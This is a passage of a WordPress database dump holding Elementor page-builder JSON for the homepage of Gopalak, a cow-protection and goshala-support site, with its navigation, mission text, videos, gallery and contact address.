\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#4EB4AC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9583,1612,'_elementor_page_assets','a:0:{}'),(9585,1613,'_elementor_edit_mode','builder'),(9586,1613,'_elementor_template_type','wp-page'),(9587,1613,'_elementor_version','3.7.8'),(9588,1613,'_wp_page_template','elementor_canvas'),(9589,1613,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to 